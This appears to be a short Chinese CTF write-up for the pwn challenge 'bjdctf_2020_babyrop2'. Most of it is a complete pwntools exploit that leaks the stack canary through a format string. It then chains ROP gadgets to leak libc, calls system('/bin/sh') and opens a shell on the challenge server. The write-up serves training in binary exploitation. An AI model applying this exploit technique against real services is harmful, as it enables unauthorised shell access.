bjdctf_2020_babyrop2

骑猪看日落 2023-02-23 08:15 42阅读 0赞

![在这里插入图片描述][20200705233227679.png]  
注意这题开启了**Canary**

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg_size_16_color_FFFFFF_t_70]  
因为限制了payload长度就不可以写got表了，但是可以直接泄露Canary值，在vuln中进行栈溢出即可拿到shell…

exp

from pwn import *
    from LibcSearcher import *
    
    context.log_level = 'debug'
    proc_name = './bjdctf_2020_babyrop2'
    elf = ELF(proc_name)
    p = process(proc_name)
    p = remote('node3.buuoj.cn', 27936)
    main_addr = elf.sym['main']
    vuln_addr = elf.sym['vuln']
    pop_rdi_ret = 0x400993
    read_got = elf.got['read']
    puts_plt = elf.plt['puts']
    p.sendlineafter('u!', b'%11$p')
    p.recv()
    canary = p.recvuntil('\n')[:-1]
    log.info(canary)
    payload = b'a' * (0x20 - 8) + p64(int(canary.decode(), 16)) + p64(0) + p64(pop_rdi_ret) + p64(read_got) + p64(puts_plt) + p64(vuln_addr)
    p.sendafter('story!', payload)
    p.recv()
    read_addr = u64(p.recv(6).ljust(0x8, b'\x00'))
    log.info(hex(read_addr))
    libc = LibcSearcher('read', read_addr)
    libc_base = read_addr - libc.dump('read')
    system_addr = libc_base + libc.dump('system')
    str_bin_sh = libc_base + libc.dump('str_bin_sh')
    payload1 = b'a' * (0x20 - 8) + p64(int(canary.decode(), 16)) + p64(0) + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(main_addr)
    p.sendafter('story!', payload1)
    p.interactive()

![在这里插入图片描述][20200706114100602.png]

[20200705233227679.png]: https://img-blog.csdnimg.cn/20200705233227679.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg_size_16_color_FFFFFF_t_70]: https://img-blog.csdnimg.cn/20200705234333104.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg==,size_16,color_FFFFFF,t_70
[20200706114100602.png]: https://img-blog.csdnimg.cn/20200706114100602.png